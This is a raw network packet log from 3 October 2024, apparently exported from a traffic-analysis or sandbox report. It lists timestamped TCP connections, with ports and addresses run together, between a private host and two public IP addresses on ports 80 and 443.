                Oct 3, 2024 03:26:48.118313074 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:48.123119116 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:26:48.225191116 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:26:48.225922108 CEST49730443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:48.225970984 CEST44349730104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:48.226033926 CEST49730443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:48.226341963 CEST49730443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:48.226378918 CEST44349730104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:48.278281927 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:26:48.694607973 CEST44349730104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:48.696784973 CEST49730443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:48.696814060 CEST44349730104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:48.814033985 CEST44349730104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:48.814448118 CEST49730443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:48.814492941 CEST44349730104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:49.101541042 CEST44349730104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:49.101610899 CEST44349730104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:49.101885080 CEST49730443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:49.102135897 CEST49730443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:49.111358881 CEST49731443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:49.111421108 CEST44349731104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:49.111515045 CEST49731443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:49.111854076 CEST49731443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:49.111879110 CEST44349731104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:49.587771893 CEST44349731104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:49.641290903 CEST49731443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:49.696669102 CEST49731443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:49.696681976 CEST44349731104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:49.794975042 CEST44349731104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:49.796072960 CEST49731443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:49.796096087 CEST44349731104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:50.012587070 CEST44349731104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:50.012685061 CEST44349731104.21.54.163192.168.2.6
                Oct 3, 2024 03:26:50.012731075 CEST49731443192.168.2.6104.21.54.163
                Oct 3, 2024 03:26:50.013921976 CEST49731443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:20.028289080 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:27:20.065623999 CEST8049715172.67.74.152192.168.2.6
                Oct 3, 2024 03:27:20.065788984 CEST4971580192.168.2.6172.67.74.152
                Oct 3, 2024 03:27:20.068864107 CEST5291880192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:20.077306986 CEST8052918104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:20.077374935 CEST5291880192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:20.077756882 CEST5291880192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:20.083745003 CEST8052918104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:20.607021093 CEST8052918104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:20.611409903 CEST52919443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:20.611433983 CEST44352919104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:20.611790895 CEST52919443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:20.611790895 CEST52919443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:20.611815929 CEST44352919104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:20.653254986 CEST5291880192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:21.200252056 CEST44352919104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:21.202212095 CEST52919443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:21.202227116 CEST44352919104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:21.563870907 CEST44352919104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:21.564141989 CEST52919443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:21.564157963 CEST44352919104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:21.904748917 CEST44352919104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:21.904853106 CEST44352919104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:21.904908895 CEST52919443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:21.905266047 CEST52919443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:21.905555010 CEST5291880192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:21.924032927 CEST8052918104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:22.023324966 CEST8052918104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:22.034315109 CEST52920443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:22.034367085 CEST44352920104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:22.034440041 CEST52920443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:22.034768105 CEST52920443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:22.034784079 CEST44352920104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:22.080884933 CEST5291880192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:22.563035011 CEST44352920104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:22.565939903 CEST52920443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:22.565967083 CEST44352920104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:22.733017921 CEST44352920104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:22.737054110 CEST52920443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:22.737076998 CEST44352920104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:23.193085909 CEST44352920104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:23.193167925 CEST44352920104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:23.193238974 CEST52920443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:23.193680048 CEST52920443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:23.194664955 CEST52921443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:23.194698095 CEST44352921104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:23.194755077 CEST52921443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:23.195080996 CEST52921443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:23.195099115 CEST44352921104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:23.794785976 CEST44352921104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:23.796536922 CEST52921443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:23.796565056 CEST44352921104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:23.936882019 CEST44352921104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:23.937205076 CEST52921443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:23.937243938 CEST44352921104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:24.255467892 CEST44352921104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:24.255563974 CEST44352921104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:24.255625963 CEST52921443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:24.256181955 CEST52921443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:54.254796028 CEST5291880192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:54.255723000 CEST5292380192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:54.259943008 CEST8052918104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:54.259993076 CEST5291880192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:54.260535002 CEST8052923104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:54.260627031 CEST5292380192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:54.260922909 CEST5292380192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:54.265758038 CEST8052923104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:54.723021984 CEST8052923104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:54.724180937 CEST52924443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:54.724229097 CEST44352924104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:54.724672079 CEST52924443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:54.724920034 CEST52924443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:54.724941015 CEST44352924104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:54.825124025 CEST5292380192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:55.184154034 CEST44352924104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:55.186156988 CEST52924443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:55.186171055 CEST44352924104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:55.298472881 CEST44352924104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:55.298791885 CEST52924443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:55.298821926 CEST44352924104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:55.725784063 CEST44352924104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:55.725861073 CEST44352924104.21.54.163192.168.2.6
                Oct 3, 2024 03:27:55.725958109 CEST52924443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:55.726397991 CEST52924443192.168.2.6104.21.54.163
                Oct 3, 2024 03:27:55.726968050 CEST5292380192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:55.728151083 CEST5292580192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:55.732269049 CEST8052923104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:55.733006954 CEST5292380192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:55.733076096 CEST8052925104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:55.733141899 CEST5292580192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:55.733268976 CEST5292580192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:55.738528967 CEST8052925104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:56.022739887 CEST5292580192.168.2.6104.26.12.205
                Oct 3, 2024 03:27:56.070761919 CEST8052925104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:56.105324984 CEST8052925104.26.12.205192.168.2.6
                Oct 3, 2024 03:27:56.105403900 CEST5292580192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:01.327543020 CEST5292680192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:01.477852106 CEST8052926104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:01.478065968 CEST5292680192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:01.478065968 CEST5292680192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:01.482887983 CEST8052926104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:01.942761898 CEST8052926104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:01.944117069 CEST52927443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:01.944154024 CEST44352927104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:01.944217920 CEST52927443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:01.944570065 CEST52927443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:01.944585085 CEST44352927104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:02.137639999 CEST5292680192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:02.408808947 CEST44352927104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:02.411952019 CEST52927443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:02.411967039 CEST44352927104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:02.545764923 CEST44352927104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:02.547403097 CEST52927443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:02.547420979 CEST44352927104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:02.880316973 CEST44352927104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:02.880744934 CEST44352927104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:02.880841970 CEST52927443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:02.881031036 CEST52927443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:02.881347895 CEST5292680192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:02.882128000 CEST5292880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:02.886483908 CEST8052926104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:02.886594057 CEST5292680192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:02.886908054 CEST8052928104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:02.887025118 CEST5292880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:02.887124062 CEST5292880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:02.891994953 CEST8052928104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:03.366909981 CEST8052928104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:03.368176937 CEST52929443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:03.368228912 CEST44352929104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:03.368355989 CEST52929443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:03.368700981 CEST52929443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:03.368736029 CEST44352929104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:03.435784101 CEST5292880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:03.828509092 CEST44352929104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:03.830734015 CEST52929443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:03.830825090 CEST44352929104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:03.964687109 CEST44352929104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:03.965090990 CEST52929443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:03.965157986 CEST44352929104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:04.255191088 CEST44352929104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:04.255254984 CEST44352929104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:04.255316019 CEST52929443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:04.255810022 CEST52929443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:04.257152081 CEST52930443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:04.257183075 CEST44352930104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:04.257230043 CEST52930443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:04.257672071 CEST52930443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:04.257688999 CEST44352930104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:04.719866991 CEST44352930104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:04.723634005 CEST52930443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:04.723671913 CEST44352930104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:04.859050035 CEST44352930104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:04.861212015 CEST52930443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:04.861243010 CEST44352930104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:05.096831083 CEST52930443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:05.096927881 CEST44352930104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:05.097146034 CEST44352930104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:05.097347021 CEST52930443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:05.097347975 CEST52930443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:24.462464094 CEST5292880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:24.463538885 CEST5293280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:24.467545986 CEST8052928104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:24.467614889 CEST5292880192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:24.468379974 CEST8052932104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:24.469280005 CEST5293280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:24.469759941 CEST5293280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:24.474776983 CEST8052932104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:24.945278883 CEST8052932104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:24.948673964 CEST52933443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:24.948776960 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:24.949362993 CEST52933443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:24.949743986 CEST52933443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:24.949784040 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:24.997014046 CEST5293280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:25.414702892 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:25.414910078 CEST52933443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:25.417342901 CEST52933443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:25.417376041 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:25.417618036 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:25.419286966 CEST52933443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:25.463423967 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:25.550184011 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:25.550612926 CEST52933443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:25.550682068 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:25.976861000 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:25.976938009 CEST44352933104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:25.977061033 CEST52933443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:25.977421045 CEST52933443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:25.977762938 CEST5293280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:25.978516102 CEST5293480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:25.982887030 CEST8052932104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:25.982999086 CEST5293280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:25.983444929 CEST8052934104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:25.983570099 CEST5293480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:25.983685970 CEST5293480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:25.988643885 CEST8052934104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:26.439889908 CEST8052934104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:26.445641041 CEST52935443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:26.445710897 CEST44352935104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:26.446173906 CEST52935443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:26.446173906 CEST52935443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:26.446227074 CEST44352935104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:26.590789080 CEST5293480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:26.920610905 CEST44352935104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:26.923701048 CEST52935443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:26.923716068 CEST44352935104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.036358118 CEST44352935104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.036768913 CEST52935443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:27.036811113 CEST44352935104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.338664055 CEST44352935104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.338757038 CEST44352935104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.338896990 CEST52935443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:27.339365005 CEST52935443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:27.340272903 CEST52936443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:27.340298891 CEST44352936104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.340364933 CEST52936443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:27.340714931 CEST52936443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:27.340723038 CEST44352936104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.804296017 CEST44352936104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.856235981 CEST52936443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:27.856251001 CEST44352936104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.952579975 CEST44352936104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:27.958970070 CEST52936443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:27.958977938 CEST44352936104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:28.241175890 CEST44352936104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:28.241266012 CEST44352936104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:28.241328955 CEST52936443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:28.241839886 CEST52936443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:28.531486988 CEST5293480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:28.532936096 CEST5293780192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:28.537710905 CEST8052934104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:28.537795067 CEST5293480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:28.539134979 CEST8052937104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:28.539211035 CEST5293780192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:28.540184975 CEST5293780192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:28.545108080 CEST8052937104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:29.004704952 CEST8052937104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:29.006062984 CEST52938443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:29.006094933 CEST44352938104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:29.006153107 CEST52938443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:29.006481886 CEST52938443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:29.006495953 CEST44352938104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:29.090754986 CEST5293780192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:29.464555979 CEST44352938104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:29.470114946 CEST52938443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:29.470134020 CEST44352938104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:29.596460104 CEST44352938104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:29.598345995 CEST52938443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:29.598367929 CEST44352938104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:29.947434902 CEST44352938104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:29.947520971 CEST44352938104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:29.947664022 CEST52938443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:29.948133945 CEST52938443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:29.948323011 CEST5293780192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:29.949103117 CEST5293980192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:29.953464985 CEST8052937104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:29.953624010 CEST5293780192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:29.954021931 CEST8052939104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:29.954101086 CEST5293980192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:29.955442905 CEST5293980192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:29.960270882 CEST8052939104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:30.578412056 CEST8052939104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:30.614098072 CEST52940443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:30.614137888 CEST44352940104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:30.614206076 CEST52940443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:30.614845037 CEST52940443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:30.614860058 CEST44352940104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:30.646933079 CEST8052939104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:30.647856951 CEST5293980192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:31.076399088 CEST44352940104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:31.078319073 CEST52940443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:31.078349113 CEST44352940104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:31.189789057 CEST44352940104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:31.190144062 CEST52940443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:31.190155029 CEST44352940104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:31.528069019 CEST44352940104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:31.528156996 CEST44352940104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:31.528347015 CEST52940443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:31.528723001 CEST52940443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:31.529599905 CEST52941443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:31.529649973 CEST44352941104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:31.529840946 CEST52941443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:31.530081034 CEST52941443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:31.530097008 CEST44352941104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:31.998495102 CEST44352941104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:32.000721931 CEST52941443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:32.000761032 CEST44352941104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:32.112736940 CEST44352941104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:32.113132000 CEST52941443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:32.113157034 CEST44352941104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:32.422931910 CEST44352941104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:32.423019886 CEST44352941104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:32.423091888 CEST52941443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:32.423557043 CEST52941443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:34.297059059 CEST5293980192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:34.298036098 CEST5294280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:34.302103043 CEST8052939104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:34.302225113 CEST5293980192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:34.302910089 CEST8052942104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:34.303016901 CEST5294280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:34.303497076 CEST5294280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:34.308656931 CEST8052942104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:34.764616013 CEST8052942104.26.12.205192.168.2.6
                Oct 3, 2024 03:28:34.765831947 CEST52943443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:34.765873909 CEST44352943104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:34.765937090 CEST52943443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:34.766297102 CEST52943443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:34.766319036 CEST44352943104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:34.834965944 CEST5294280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:35.222897053 CEST44352943104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:35.224960089 CEST52943443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:35.224972963 CEST44352943104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:35.345360994 CEST44352943104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:35.349044085 CEST52943443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:35.349087000 CEST44352943104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:36.661830902 CEST44352943104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:36.661907911 CEST44352943104.21.54.163192.168.2.6
                Oct 3, 2024 03:28:36.661963940 CEST52943443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:36.662673950 CEST52943443192.168.2.6104.21.54.163
                Oct 3, 2024 03:28:36.662728071 CEST5294280192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:36.663503885 CEST5294480192.168.2.6104.26.12.205
                Oct 3, 2024 03:28:36.885472059 CEST8052944104.26.12.205192.168.2.6
